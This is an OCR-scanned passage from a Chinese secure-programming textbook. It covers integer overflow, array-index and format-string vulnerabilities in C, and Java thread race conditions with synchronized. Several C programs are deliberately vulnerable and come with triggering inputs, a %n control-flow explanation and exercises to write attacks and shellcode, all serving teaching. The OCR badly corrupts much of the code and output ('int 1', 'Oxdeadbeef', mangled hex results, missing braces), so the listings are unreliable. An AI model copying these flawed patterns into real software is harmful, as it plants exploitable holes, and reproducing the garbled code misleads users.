综 上 所 述 ,整数 溢出 是 尝试 存储 一 个 很 大 的 数 到 一 个 变量 中 ,由 于 这 个 变量 能 够 存 
储 的 数值 范围 太 小 ,不 足以 存储 那个 很 大 的 数 ,因而 造成 溢出 。 下 面 用 最 简单 的 程序 来 
说 明 这 个 问题 (使 用 的 环境 是 DEV C++ ,用 户 也 可 以 使 用 TurboC, 稍 有 不 同 ): 


P02_08.c 


#include < stdio.h> 
int main(void) 
{ 
int 1; 
Short s; 
char c; 
1 = Oxdeadbeef; 
s= 1; 
c=1; 
printf("1= 0x%x( %d bytes)\n", 1, sizeof(1)); 
printf("s = 0x%x( %d bytes)\n", s, sizeof(s)); 
printf("c= 0x%x( %d bytes)\n", c, sizeof(c)); 
return 0; 


} 


生成 可 执行 文件 ,然后 运行 ,结果 显示 为 : 


l=Bxdeadheef (4 bytes» 
s=Bxffffheef (2 bytes)> 


c=Bxffffffef (1 bytes》 


如 前 所 述 ,整数 溢出 并 不 像 普 通 的 漏洞 类 型 ,一 般 不 会 允许 直接 改写 内 存 。 但 是 一 
个 精巧 的 设计 可 以 直接 改变 程序 的 控制 流程 ,程序 员 此 时 很 难 有 办 法 在 进程 里 检查 此 
后 的 结果 , 带 给 用 户 的 感觉 就 是 : 计算 结果 和 正确 结果 之 间 , 有 一 定 的 偏差 。 此 种 攻击 
一 般 的 方法 是 : 攻击 者 强迫 一 个 变量 包含 错误 的 值 ,从 而 在 后 面 的 代码 中 出 现 问题 。 
看 下 面 的 例子 : 


P02_09.c 


#include < stdio.h> 
# include < string.h> 
int main(int argc, char * argv[]) 
{ 
unsigned short s; 
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int i; 
char buf[100]; 
i = atoi(argv[1]); 


s= i; 
if(s >= 100) 
{ 
printf(" 拷 贝 字 节 数 太 大 ,请 退出 !\n"); 
return —1; 
} 


memcpy(buf, argv[2], i); 

buf[i] = "\0'; 

printf(" 成 功 拷 贝 %d 个 字 节 \n", i); 
return 0; 


j 


该 程序 的 作用 是 将 argv[2] 的 内 容 拷贝 到 buf 中 ,由 argv[1] 指 定 拷贝 的 字 节 数 ,在 
程序 中 ,进行 了 相对 严格 的 大 小 检查 : 如 果 argv[1] 的 值 大 于 等 于 buf 数组 的 大 小 
(100) , 则 不 进行 拷贝 。 


生成 可 执行 文件 ,然后 运行 : 
显示 ， 


完全 正常 。 运 行 : 
>P92_69 1999 hello 
显示 : 


贝 字 市 


该 程序 看 似 正常 ,但 是 输入 : 
>P92_9?9 65536 hello 
程序 显示 : 


拷 见 65536 个 字 节 


该 程序 中 ,程序 从 命令 行 参 数 中 得 到 一 个 整数 值 存放 在 整 型 变量 i 中 ,然后 这 个 值 
被 赋予 unsigned short 类 型 的 整数 s, 由 于 s 长 16 位 ,16 位 能 够 存储 的 最 大 数 是 : 
i TTI 
即 十 进 制 的 65 535, 因 此 ,unsigned short 存储 的 范围 是 0 一 65 535, 如 果 这 个 值 大 于 
unsigned short 类 型 所 能 够 存储 的 值 65 535, 它 将 被 截断 。 因 此 ,输入 65 536 ,系统 会 将 
其 认为 0。 因 为 65 536 的 二 进 制 是 : 
1 00000000 00000000 
系统 只 取 后 面 16 位 进行 存储 。 
实际 上 ,整数 溢出 的 危害 还 在 于 能 够 产生 “并 发 攻击 ”, 类 似 于 医学 中 的 “并 发 症 ”。 
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以 上 面 的 例子 为 例 , 程 序 绕 过 代码 中 大 小 判断 部 分 的 边界 检测 ,又 可 以 导致 缓冲 区 溢 
出 ,只 要 使 用 一 般 的 栈 溢出 技术 就 能 够 利用 这 个 溢出 程序 。 
下 面 例子 列举 了 另外 几 个 出 现 问 题 的 运算 : 


P02_10.c 


# include < stdio.h> 

int main(int argc, char * argv[]) 

{ 
int nl = Ox7fffffff; 
int n2 = 0x40000000; 
int n6 = Ox8fffffff; 
printf("%d(Ox%x)+1= %d(Ox%x)\n", nl, nl nl +1, nl+1); 
printf("%d(Ox%x)+ Sd(Ox%x) = %d(Ox% x)\n", n2, n2, n2, n2, n2 + n2, n2 + n2); 
printf("%d(Ox%x)*4= %d(O0x%x)\n", n2, n2, n2¥* 4, n2 # 4); 
printf("%d(Ox%x)— Sd(Ox%x)= %d(Ox% x)\n", n2, n2, n6, n6, n2— n6, n2— n6); 
return 0; 


过 


生成 可 执行 文件 并 运行 ,得 到 如 下 结果 : 


214?7483647(Bx7fffffff>+1=-2147483648(Dx8D9D88989> 
1973?741824(9x409000989>+1973?741824(Bx4008D9087> =-2147483648(Bx8B880009> 


1973741824(Dx49900B96897x4=9(CBxB8> 
1073741824C@x4006668606)--1879648193 (Bx8fffffff>=-1342177279《@Gxb86600001》 


以 上 显示 基本 上 是 可 以 被 攻击 者 利用 的 一 些 运算 。 很 显然 ,这 些 不 正常 的 结果 都 
是 由 于 整数 溢出 引起 的 ,读者 可 以 自己 分 析 其 原理 。 
整数 溢出 还 有 可 能 在 动态 分 配 内 存 时 被 利用 ,考查 如 下 代码 : 


P02_11.¢ 


# include < stdio.h> 
#include < stdlib.h> 
intx arraycpy(int * array, int len) 
{ 
int * newarray, i; 
newarray = malloc(len* sizeof(int)); 
printf(" 为 newarray 成 功 分 配 %d 字 节 内 存 \n", len x sizeof(int)); 
if(newarray == NULL) 
{ 
return —1; 
} 
printf(" 循 环 运行 次 数 : % d(0x% x)\n", len, len); 
for(i = 0; i < len; i++) 
{ 
newarray[i] = array[i]; 
} 
return newarray; 
i 
int main(int argc, char *argv[]){ 
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int array[] = {1,2,3,4,5}; 
arraycpy(array, atoi(argv[1])); 
return 0; 


} 


该 代码 将 array 拷贝 到 newarray 中 ,生成 exe 文件 ,输入 命 今 : 
运行 后 的 显示 为 : 


看 似 没 有 问题 ,但 是 如 果 输 入 下 面 的 命令 : 
1073741824 的 十 六 进 制 是 0x40000000, 从 前 一 个 例子 可 以 看 出 ,0x40000000 x 4 一 0x0。 
此 ,屏幕 上 显示 : 


成 功 分 配 8 字 节 内 存 


数 ，197?3741824(Bx49990999》 
很 显然 ,这 个 看 起 来 没有 问题 的 函数 ,可 能 出 现在 没有 为 newarray 分 配 内 存 的 情 
况 下 , 却 向 其 里 面 拷贝 数组 元 素 , 循 环 的 次 数 非常 多 ,严重 时 造成 系统 崩溃 。 攻 击 者 通 
过 选择 一 个 合适 的 值 给 len, 可 以 使 循环 反复 执行 导致 缓冲 区 溢出 。 
还 有 一 种 情况 ,通过 改写 malloc 的 控制 结构 ,也 能 够 在 正常 的 函数 运行 过 程 中 插 
入 其 他 可 执行 恶意 代码 。 
P02_12.c 


#include < stdio.h> 
#include < stdlib.h> 
int catstring(char * buf1，char * buf2, int lenl, int len2) 
{ 
char mybuf[256]; 
if((lenl + len2) > 256) 
{ 
printf(" 超 出 mybuf 容纳 范围 !\n"); 
return —1; 
} 
memcpy(mybuf, bufl, lenl); 
memcpy(mybuf + lenl, buf2, len2); 
printf(" 复 制 %d+ 名 d= $%d 个 字 节 到 mybuf!\n", lenl, len2, lenl + len2); 
return 0; 
} 
int main( int argc, char * argv[]) 
{ 
catstring(argv[1],argv[2],atoi(argv[3]),atoi(argv[4])); 
return 0; 
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该 例子 看 起 来 无 懈 可 击 ,也 可 进行 lenl 和 len2 相 加 之 后 的 检查 ,输入 : 


>P62_12 China Hello 3 4 


输入 : 


相 出 nybuf 容纳 范围 
一 切 正常 ,但 是 如 果 输 入 : 


>P@2_12 China Hello 2147?483647? 1 


2 147 483 647 的 十 六 进 制 为 0x7FFFFFFF ,该 运行 结果 如 图 2-7 所 示 。 


P02_12. exe - 应 用 程序 铺 误 划 
“0xTTbebeab” 指 令 引 用 的 “0x006d0043” 内 存 。 该 内 存 不 能 为 “read"。 
本 人 
[xp | 
图 2-7 


程序 会 前 省 ,根本 不 会 显示 : "超出 mybuf 容纳 范围 !" 。 是 什么 原因 ? 请 读者 自己 
分 析 。 


2.2.3 解决 方案 


整数 溢出 是 非常 危险 的 ,部 分 原因 是 因为 它 在 发 生 后 不 可 能 被 发 现 ,也 就 是 说 ,一 
个 整数 溢出 发 生 了 ,应 用 程序 并 不 知道 它 的 计算 是 错误 的 。 因 此 应 用 程序 在 假定 它 是 
正确 的 情况 下 ,会 继续 运行 下 去 。 在 安全 的 系统 中 ,这 种 结果 具有 巨大 的 危害 ,有 时 其 
至 能 够 造成 系统 崩溃 。 

解决 整数 溢出 的 方案 ,主要 是 编程 之 前 必须 进行 详细 的 预测 ,多 考虑 一 些 问题 ,在 
编程 时 将 各 种 问题 考虑 到 并 且 进 行 相应 的 处 理 。 如 : 

。 充分 考虑 各 种 数据 的 取 值 范围 ,使 用 合适 的 数据 类 型 ; 

。 尽量 不 要 在 不 同 范围 的 数据 类 型 之 间 进 行 赋值 .等 等 。 


2.3 数组 和 字符 串 问 题 


2.3.1 数组 下 标 问题 
数组 下 标 问 题 ,本 质 上 也 是 属于 缓冲 区 溢出 问题 。 在 本 章 的 第 一 节 ,讲述 的 字符 串 
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缓冲 区 溢出 ,实际 上 字符 串 就 是 一 个 字符 数组 。 除 了 字符 数组 ,其 他 数组 也 会 遇 到 类 似 
问题 吗 ? 答案 是 肯定 的 。 本 部 分 将 以 整数 数组 为 例 , 来 讲述 数组 下 标 引起 的 缓冲 区 溢 
出 问题 。 

如 下 例子 : 


P02_13.c 


# include < stdio.h> 
int Array[10]; 
void InsertInt(int index, int value) 
{ 
Array[ index] = value; 
printf(" 将 值 %d 存 人 Array[ %d]\n", index, value); 
} 
int main( int argc, char * argv[]) 
{ 
int index = atoi(argv[1]); 
int value = atoi(argv[2]); 
InsertInt( index, value); 
return 0; 


} 


运行 ， 


>P92_13 5 6 


>P92_13 5 680 


入 hrray[69B] 


相当 于 在 Array 基 址 后 偏 移 600 个 整数 元 素 后 填 人 元 素 5, 由 于 Array 只 定义 大 小 为 10， 
因此 ,数字 5 就 被 填 到 一 个 未 知 空间 并 将 原来 的 值 覆盖 ,如果 适 当地 设计 填 人 的 地 址 和 
数据 ,就 可 以 进行 攻击 。 


2.3.2 字符 串 格式 化 问题 


字符 串 格式 化 不 当 , 也 可 能 造成 漏洞 ,其 攻击 方法 和 缓冲 区 溢出 类 似 。 这 类 问题 在 
printf 系列 函数 中 较 多 ,具有 这 种 漏洞 的 函数 有 printf 函数 .sprintf 函数 等 。 不 过 一 般 
说 来 ,这 种 漏洞 可 以 很 容易 避免 。 

此 种 漏洞 是 怎样 出 现 的 呢 ? 下 面 举 一 个 例子 。 如 打印 输出 一 个 字符 串 , 写 如 下 
代码 : 
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printf("%s", str); 


不 会 出 现 问 题 ; 如 果 写 : 


printf(str); 


则 会 出 现 安全 隐患 ,在 不 知 不 觉 中 打开 了 一 个 安全 漏洞 。 

为 什么 该 代码 有 问题 ? 实际 上 ,此 时 printf 函数 传人 了 一 个 想 要 逐 字 打印 的 字符 
串 ,但 是 该 字符 串 被 printf 函数 解释 为 一 个 格式 化 字符 串 。 函 数 在 其 中 寻找 特殊 的 格 
式 字 符 比如 %d。 如 果 碰 到 格式 字符 ,一 个 变量 的 参数 值 就 从 堆栈 中 取出 。 

很 明显 ,攻击 者 可 以 通过 打印 出 堆栈 中 的 这 些 值 来 查看 程序 的 内 存 , 或 是 向 运行 中 
程序 内 存 中 写 入 任意 值 ! 

考查 如 下 代码 : 


P02_14.c 


#include < stdio.h> 
int main(int argc, char * argv[]) 
{ 

printf(argv[1]); 

return 0; 


生成 可 执行 文件 后 运行 : 


这 没 问 题 , 但 是 如 果 输 入 : 
屏幕 上 显示 : 


您 辆 入 的 字 付 串 是 : 


143e2ae84612b512 


这 是 怎么 回 事 呢 ? 如 前 所 述 ,函数 碰 到 %x 时 ,一 个 变量 的 参数 值 就 从 堆栈 中 取出 , 当 
然 , 现 在 也 不 知道 取出 的 值 有 什么 用 。 


要 想 利用 字符 串 格式 化 漏洞 ,首先 必须 介绍 一 下 %n 格式 符 。%n 允许 写 入 指定 数 


据 到 某 个 地 址 ,更 详细 的 解释 是 : printf 的 %n 格式 化 说 明 符 ,允许 向 后 面 一 个 存储 单 
元 写 信 前面 输出 数据 的 总 长 度 。 如 下 例 : 
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P02_15.¢c 


# include < stdio.h> 
int main(int argc, char x* argv[]) 
{ 
int k=0; 
char buffer[28] = "ABCDEFGHIJKLMNOPQORSTUVWXY2" ; 
printf("% .20s%n\n",buffer, gk); 
printf("k= %d",k); 
return 0; 


} 


运行 后 ,显示 : 


ABCDEFGHI JKLMNOPQRST 
k=20 


k 的 值 原来 是 0, 此 时 变 成 了 20, 这 是 因为 printf("%. 20s%n\n",buffer,&&k); 在 
执行 的 过 程 中 ,输出 20 个 字符 的 宽度 ,这 个 数值 20 就 被 写 到 k 中。 这 样 ,只 要 前 面 输 
出 数据 的 长 度 为 一 个 精心 设计 的 值 ,等 于 需要 程序 跳 转 到 的 那个 地 址 ,而 %n 恰到好处 


。 地 将 这 一 地 址 写 人 适当 位 置 ,那么 就 可 以 按照 自己 的 意愿 改变 程序 流程 了 。 


小 结 


本 章 讲解 了 内 存 安全 中 的 几 个 问题 ,主要 针对 缓冲 区 溢出 整数 溢出 数组 越界 、 字 
符 串 格式 化 等 问题 进行 讲解 。 实 际 上 ,内 存 安全 问题 远 远 不 止 这 些 , 用 户 可 以 通过 查找 
其 他 资料 ,来 了 解 并 解决 一 些 内 存 安全 的 问题 。 


练 习 


. 试 编写 一 个 包含 堆栈 溢出 漏洞 的 代码 ,用 命令 行 来 运行 ,并 进行 攻击 。 
. 试 编写 一 个 含有 整数 溢出 漏洞 的 代码 ,用 户 能 够 运行 它 ,让 程序 死 循 环 。 
. 查阅 相应 文献 ,编写 一 段 字 符 串 格式 化 进行 攻击 的 代码 。 
. 堆 和 堆栈 有 什么 区 别 ? 
查阅 与 Morris 蠕虫 有 关 的 文献 ,描述 其 大 体 过 程 。 
写 一段 代 码 解 决 第 1 题 。 
.编写 一 段 代码 解决 第 2 题 。 
. 查阅 有 关 shellcode 的 内 容 . 设 计 一 个 和 书 上 不 同 的 shellcode 攻击 的 程序 。 
.怎样 解决 缓冲 区 溢出 ? 
10. 怎样 解决 堆 溢 出 ? 


oo 站 Da 
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线程 /进程 安全 


进程 和 线程 是 两 个 范围 不 同 的 概念 。 进 程 是 程序 在 计算 机 上 的 一 次 执行 活动 。 运 
行 一 个 程序 ,相当 于 启动 了 一 个 进程 。 进 程 是 操作 系统 进行 资源 分 配 的 单位 ,通俗 地 
讲 , 是 一 个 正在 执行 的 程序 。 

线程 是 进程 中 的 一 个 实体 ,是 被 系统 独立 调度 和 分 派 的 基本 单位 , 它 可 与 同属 一 个 
进程 的 其 他 线程 共享 进程 所 拥有 的 全 部 资源 。 一 个 线程 可 以 创建 和 撤销 另 一 个 线程 ， 
同一 进程 中 的 多 个 线程 之 间 可 以 并 发 执行 。 比 如 ,一 个 在 线 播放 软件 ,在 播放 歌曲 的 同 
时 还 可 以 进行 下 载 ,就 可 认为 这 两 件 工作 由 不 同 的 线程 完成 

线程 和 进程 的 开发 和 相关 操作 ,在 程序 设计 中 具有 重要 地 位 ,线程 和 进程 的 安全 和 
系统 的 安全 息息相关 。 对 于 不 够 熟练 的 程序 员 来 说 ,很 容易 出 现 安全 隐患 ,而 这 些 安 全 
问题 又 具有 不 间断 发 生 , 难 于 调试 等 特点 。 

一 般 说 来 ,线程 的 安全 性 主要 来 源 于 其 运行 的 并 发 性 和 对 资源 的 共享 性 ; 进程 的 
安全 性 主要 在 应 用 上 ,在 于 其 对 系统 的 威胁 性 ,不 过 对 于 系统 软件 的 开发 者 ,进程 安全 
的 考虑 需要 更 加 深入 。 

本 章 主要 针对 线程 和 进程 开发 过 程 中 的 安全 问题 进行 讲述 ,首先 基于 面向 对 象 语 
言 ,讲解 线程 的 基本 机 制 , 然 后 讲解 线程 操作 过 程 中 的 几 个 重要 的 安全 问题 (线程 同步 
安全 、 线 程 协作 安全 、 线 程 死 锁 、 线 程控 制 ) ,最 后 讲解 进程 安全 。 


3.1 线程 机 制 


3.1.1 为 什么 需要 线程 


由 于 Java 在 线程 操作 方面 具有 较 好 的 面向 对 象 特性 ,也 具有 一 定 的 代表 性 ,本 章 
基于 Java 语言 进行 讲解 。 实 际 上 ,多 线程 最 直观 的 说 法 是 : 让 应 用 程序 看 起 来 好 像 同 
时 能 做 好 几 件 事情 。 为 了 表达 这 个 问题 ,下 面 用 一 个 案例 来 说 明 。 比 如 ,需要 在 控制 台 
上 每 隔 1s 打印 一 个 欢迎 信息 。 代 码 如 下 所 示 : 
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P03_01. java 


public class P03_01 
{ 
public static void main(String[ ] args) 
{ 
while(true) 
人 
System. out. println("Welcome" ) ; 
try 
{ 
Thread. sleep(1000); 
}catch(Exception ex){} 
} 
System. out. println(" 其 他 工作 "); ”// 代 码 行 1 


} 
} 


该 程序 似乎 没有 什么 问题 ,运行 时 ,"Welcome" 也 能 不 断 打印 。 但 是 ,打印 函数 中 
的 while 循环 是 个 死 循 环 ,也 就 是 说 ,这 个 循环 不 运行 完毕 ,程序 将 不 能 做 其 他 事情 。 
比如 ,程序 中 的 代码 行 1 永远 也 无 法 运行 。 这 就 给 程序 的 功能 形成 了 巨大 的 阻碍 。 

在 实际 应 用 开发 过 程 中 ,经 常会 出 现 一 个 程序 看 起 来 同时 做 好 几 件 事情 的 情 
况 , 如 : 

。 程序 进行 一 个 用 时 较 长 的 计算 ,希望 该 计算 进行 的 时 候 , 程 序 还 可 以 做 其 他 | 

事情 ; | 

。 软件 要 能 够 接受 多 个 客户 的 请 求 ,而 让 客户 感觉 不 出 等 待 ; 

。 媒体 播放 器 在 播放 歌曲 的 同时 也 能 下 载 电 影 ; 

。 财务 软件 在 后 台 进 行 财务 汇总 的 同时 还 能 接受 终端 的 请 求 ,等 等 。 

在 这 些 情况 下 ,多 线程 就 能 够 起 到 巨大 的 作用 。 

线程 和 进程 的 关系 很 紧密 ,进程 和 线程 是 两 个 不 同 的 概念 ,但 是 进程 的 范围 大 于 线 
程 。 通 俗 地 说 ,进程 就 是 一 个 程序 ,线程 是 这 个 程序 能 够 同时 做 的 各 件 事情 。 比 如 , 媒 
体 播放 机 运行 时 就 是 一 个 进程 ,而 媒体 播放 机 同时 做 的 下 载 文件 和 播放 歌曲 ,就 是 两 个 
线程 。 

P03_01. java 如 果 用 线程 进行 开发 ,在 Java 语言 里 面 ,就 可 以 用 如 下 方式 (其 他 语 
言 类 似 ) : 


P03_02. java 


class WelcomeThread extends Thread 
{ 
public void run() 
{ 
while(true) 
{ 
System. out. println("Welcome"); 


try 
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SS 
{ 
Thread. sleep( 1000); 
}catch(Exception ex){} 
} 
} 


{ 
public static void main(String[ ] args) 
{ 
WelcomeThread wt = new WelcomeThread(); 
wt. start(); // 开 启 线 程 
System. out. println(" 其 他 工作 "); // 代 码 行 1 


Note public class P03_02 


|] 


运行 后 ,就 会 发 现 ,此 时 “打印 欢迎 信息 ”和 “其 他 工作 ”就 “同时 ”做 了 。 效 果 如 
图 3-1 所 示 。 
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图 3-1 
提示 。 在 Java 中 ,该 代码 还 有 一 种 写法 : 


P03_02_1. java 


public class P03_02 implements Runnable 
{ 
public void run() 
{ 
while(true) 
{ 
System. out. println( "Welcome"); 
try 
{ 
Thread. sleep(1000); 
}catch(Exception ex){} 
} 
} 
public static void main(String[ ] args) 
{ 
P03_02 p03_02 = new P03_02 (); 
new Thread(p03_02). start(); // 开 启 线程 
System. out. println(" 其 他 工作 "); // 代 码 行 1 
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3.1.2 线程 机 制 和 生命 周期 


每 个 程序 至 少 自动 拥有 一 个 线程 , 称 为 主线 程 。 当 程序 加 载 到 内 存 时 ,启动 主线 
程 。 从 上 节 的 程序 可 以 看 出 ,代码 行 : 


WelcomeThread wt = new WelcomeThread( ); 
wt. start(); 


实际 上 相当 于 实例 化 一 个 新 的 线程 对 象 ,并 运行 该 线程 中 的 run() 函数 。 该 线程 
的 运行 并 不 影响 主线 程 向 下 执行 ,这 是 为 什么 呢 ? 

这 是 由 于 多 线程 机 制 实际 上 相当 于 CPU 交替 分 配给 不 同 的 代码 段 来 运行 : 也 就 
是 说 , 某 一 个 时 间 段 , 某 线程 运行 ,下 一 个 时 间 段 , 另 一 个 线程 运行 ,各 个 线程 都 有 抢占 
CPU 的 权利 ,至 于 决定 哪个 线程 抢占 ,是 操作 系统 需要 考虑 的 事情 。 由 于 时 间 段 的 轮 ， 
转 非 常 快 ,用 户 感 觉 不 出 各 个 线程 抢占 CPU 的 过 程 , 看 起 来 好 像 计算 机 在 “同时 ?做 好 | 
几 件 事情 。 | 

一 个 线程 有 从 创建 .运行 到 消亡 的 过 程 , 称 为 线程 的 生命 周期 。 用 线程 的 状态 
Cstate) 表 明 线 程 处 在 生命 周期 的 哪个 阶段 。 线 程 有 创建 .可 运行 .运行 中 .阻塞 .死亡 5 
种 状态 。 通 过 线程 的 控制 与 调度 可 使 线程 在 这 几 种 状态 间 转 化 。 这 5 种 状态 详细 描述 
如 下 ， 

(1) 创建 状态 。 使 用 new 运算 符 创 建 一 个 线程 后 。 该 线程 仅仅 是 一 个 空 对 象 , 系 
统 没 有 分 配 资源 。 

(2) 可 运行 状态 。 使 用 start() 方 法 启动 一 个 线程 后 ,系统 分 配 了 资源 ,使 该 线程 处 
于 可 运行 状态 (Runnable) 。 

(3) 运行 中 状态 。 占 有 CPU ,执行 线程 的 run() 方 法 。 

(4) 阻塞 状态 。 运 行 的 线程 因 某 种 原因 停止 继续 运行 。 

(5) 死亡 状态 。 线 程 结束 。 

线程 的 安全 隐患 可 能 出 现在 各 个 状态 。 一 般 说 来 ,线程 的 安全 性 来 源 于 两 个 方面 : 

J@ 多 个 线程 之 间 可 能 会 共享 进程 的 内 存 资源 。 

@ CPU 的 某 个 时 间 段 分 配给 哪个 线程 使 用 ,默认 情况 下 无 法 由 用 户 控制 。 | 

多 线程 的 安全 问题 比较 复杂 ,解决 方法 繁多 ,在 这 里 阐述 几 个 比较 典型 的 安全 
问题 。 


3.2 线程 同步 安全 


3.2.1 线程 同步 | 

默认 情况 下 ,线程 都 是 独立 的 .而且 异 步 执行 ,线程 中 包含 了 运行 时 所 需要 的 数据 
或 方法 ,而 不 需要 外 部 的 资源 或 方法 ,也 不 必 关 心 其 他 线程 的 状态 或 行为 。 但 是 在 多 个 
线程 在 运行 时 共享 数据 的 情况 下 ,就 需 考虑 其 他 线程 的 状态 和 行为 ,否则 就 不 能 保证 程 ， 
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序 的 运行 结果 的 正确 性 。 在 某 些 项 目 中 ,经 常会 出 现 线程 同步 的 问题 , 即 多 个 线程 在 访 
问 同一 资源 时 ,会 出 现 安全 问题 。 本 节 基 于 一 个 简单 的 案例 ,针对 线程 的 同步 问题 进行 
曾 述 。 

所 谓 同 步 ,就 是 在 发 出 一 个 功能 调用 时 ,在 没有 得 到 结果 之 前 ,该 调用 就 不 返回 , 同 
时 其 他 线程 也 不 能 调用 这 个 方法 。 通 俗 地 讲 . 一 个 线程 是 否 能 够 抢占 CPU ,必须 考虑 
另 一 个 线程 中 的 某 种 条 件 ,而 不 能 随便 让 操作 系统 按照 默认 方式 分 配 CPU ,如果 条 件 
不 具备 ,就 应 该 等 待 男 一 个 线程 运行 ,直到 条 件 具备 。 


3.2.2 案例 分 析 


假设 有 若干 张 飞 机 票 , 由 两 个 线程 去 卖 它们 ,要 求 没有 票 时 能 够 提示 : 没有 票 了 
(以 最 后 剩 下 3 张 票 为 例 )。 首 先 用 传统 方法 来 编写 这 段 代码 ,代码 如 P03_03. java 
所 示 : 


P03_03. java 


class TicketRunnable implements Runnable 
{ 
private int ticketNum = 3; // 以 3 张 票 为 例 
public void run() 
{ 
while(true) 
{ 
String tName = Thread. currentThread( ) .getName( ) ; 
if(ticketNum<=0) 
{ 
System. out. println(tName + "无 票 "); 
break; 
} 
else 
{ 
ticketNum-- ; // 代码 行 1 
System. out. println(tName + 
" 卖 出 一 张 票 ,还 剩 ”+ 
ticketNum + " 张 票 ")， 


} 


public class P03_03 
{ 
public static void main(String[ ] args) 
{ 
TicketRunnable tr = new TicketRunnable(); 
Thread thl = new Thread(tr, "线程 1"); 
Thread th2 = new Thread(tr, "线程 2"); 
thl. start(); 
th2. start(); 
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} 


运行 后 ,控制 台 打 印 结果 如 图 3-2 所 示 。 

这 段 程序 看 起 来 没有 问题 ,但 是 它 很 不 安全 ,并 且 这 种 不 安全 性 很 难 发 现 ,会 给 项 
目 后 期 维护 带 来 巨大 的 代价 。 ~ 

观察 程序 中 的 代码 行 1 处 的 注释 , 当 只 剩 下 一 张 票 
时 ,线程 1 卖 出 了 最 后 一 张 票 ,接着 要 执行 ticketNum-- 
但 在 ticketNum-- 还 没 来 得 及 运行 的 时 候 , 线 程 2 有 可 能 
抢占 CPU ,来 判断 当前 有 无 票 可 卖 , 此 时 ,由 于 线程 1 还 
没有 执行 ticketNum--, 当 然 票数 还 是 1 ,线程 2 判断 还 可 国光 
以 卖 票 ,这 样 ,最 后 一 张 票 卖 出 了 两 次 。 当 然 , 上 面 的 程序 中 ,没有 给 线程 2 以 卖 票 的 机 
会 ,实际 上 票 都 由 线程 1 卖 出 ,我 们 看 不 出 其 中 的 问题 。 为 了 让 大 家 看 清 这 个 问题 ,下 
面 模拟 线程 1 和 线程 2 交替 卖 票 的 情况 。 将 P03_03. java 的 代码 改 为 P03_04. java: 


P03_04. java 


class TicketRunnable implements Runnable 
{ 
private int ticketNum = 3; // 以 3 张 票 为 例 
public void run() 
{ 
while(true) 
{ 
String tName = Thread. currentThread().getName(); 
if(ticketNum<= 0) 
{ 
System. out. println(tName + "无 票 "); 
break; 
} 
else 
{ 
try 
{ 
Thread. sleep(1000); ”// 程序 休眠 1000 毫秒 
}catch(Exception ex){} 
ticketNum—— ; // 代码 行 1 
System. out. println(tName + 
" 卖 出 一 张 票 ,还 剩 " + 
ticketNum +" 张 票 "); 


» 


public class P03_04 


41 


软件 安全 实现 一 一 安全 编程 技术 


42 ! 论 
public static void main(String[] args) 


TicketRunnable tr = new TicketRunnable(); 
Thread thl = new Thread(tr, "线程 1"); 
Thread th2 = new Thread(tr, "线程 2") ; 
thl. start(); 

th2. start(); 


该 代码 中 ,增加 了 一 行 ,使 程序 休眠 1000ms, 让 另 一 个 线程 来 抢占 CPU。 运 行 后 ， 
控制 台 打印 结果 如 图 3-3 所 示 。 
最 后 一 张 票 被 卖 出 两 次 ,系统 不 可 靠 。 
: 更 为 严重 的 是 ,该 问题 的 出 现 很 具有 随机 性 。 
比如 ,有 些 项 目 在 实验 室 运行 阶段 没有 问题 ,因为 哪 
个 线程 抢占 CPU, 是 由 操作 系统 决定 的 ,用 户 并 没 
有 权利 干涉 ,也 无 法 预测 ,所 以 ,项 目 可 能 在 商业 运 
es 行 阶段 出 现 了 问题 ,等 到 维护 人 员 去 查 问题 的 时 候 ， 
由 于 问题 出 现 的 随机 性 ,问题 可 能 就 不 出 现 了 。 这 
种 工作 往往 给 维护 带 来 了 巨大 的 代价 。 
以 上 案例 是 多 个 线程 消费 有 限 资 源 的 情况 ,该 情况 下 还 有 很 多 其 他 案例 ,如 多 个 线 
程 , 向 有 限 空 间 写 数据 时 ， 
。 线 程 1 写 完 数据 ,空间 满 了 ,但 没 来 得 及 告诉 系统 ; 
。 此 时 另 一 个 线程 抢占 CPU, 也 来 写 ,不 知道 空间 已 满 ,造成 溢出 。 


3.2.3 解决 方案 


怎样 解决 这 个 问题 ? 很 简单 ,就 是 让 一 个 线程 卖 票 时 其 他 线程 不 能 抢占 CPU。 根 
据 定义 ,实际 上 相当 于 要 实现 线程 的 同步 ,通俗 地 讲 , 可 以 给 共享 资源 (在 本 例 中 为 票 ) 
加 一 把 锁 , 这 把 锁 只 有 一 把 钥匙 。 哪 个 线程 获取 了 这 把 钥匙 , 才 有 权利 访问 该 共享 
资源 。 

有 一 种 比较 直观 的 方法 ,可 以 在 共享 资源 (如 * 票 ”每 一 个 对 象 内 部 都 增加 一 个 新 
成 员 ,标识 “ 票 是 否 正在 被 卖 中 ,其 他 线程 访问 时 ,必须 检查 这 个 标识 ,如 果 这 个 标识 确 
定 票 正在 被 卖 中 ,线程 不 能 抢占 CPU。 这 种 设计 理论 上 当然 也 是 可 行 , 但 由 于 线程 同 
步 的 情况 并 不 是 很 普遍 ,仅仅 为 了 这 种 小 概率 事件 ,在 所 有 对 象 内 部 都 开辟 另 一 个 成 员 
空间 , 带 来 极 大 的 空间 浪费 ,增加 了 编程 难度 ,所 以 ,一般 不 采用 这 种 方法 。 现 代 的 编程 
语言 的 设计 思路 都 是 把 同步 标识 加 在 代码 段 上 ,确切 地 说 ,是 把 同步 标识 放 在 “访问 共 
享 资源 (如 卖 票 ) 的 代码 段 " 上 。 

不 同 语言 中 ,同步 代码 段 的 实现 模型 类 似 ,只 是 表达 方式 有 些 不 同 。 这 里 以 Java 
语言 为 例 , 在 Java 语言 中 ,synchronized 关键 字 可 以 解决 这 个 问题 ,整个 语法 形式 表 
现 为 : 
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本 


synchronized( 同 步 锁 对 象 ) 
{ 


// 访问 共享 资源 ,需要 同步 的 代码 段 Ap 
， 二 


注意 ,synchronized 后 的 “同步 锁 对 象 "必须 是 可 以 被 各 个 线程 共享 的 ,如 this、 某 | Note 
个 全 局 变量 等 。 不 能 是 一 个 局 部 变量 。 | 

其 原理 为 : 当 某 一 线程 运行 同步 代码 段 时 ,在 “同步 锁 对 象 "上 置 一 标记 ,运行 完 这 
段 代码 ,标记 消除 。 其 他 线程 要 想 抢占 CPU 运行 这 段 代 码 , 必 须 在 “同步 锁 对 象 "上 先 
检查 该 标记 ,只 有 标记 处 于 消除 状态 ,才能 抢占 CPU。 在 上 面 的 例子 中 ,this 是 一 个 
“同步 锁 对 象 ”。 

因此 ,在 上 面 的 案例 中 ,可 以 将 卖 票 的 代码 用 synchronized 代码 块 包围 起 来 “同步 
锁 对 象 " 取 this。 如 代码 P03_05. java 所 示 : 


P03_05. java 


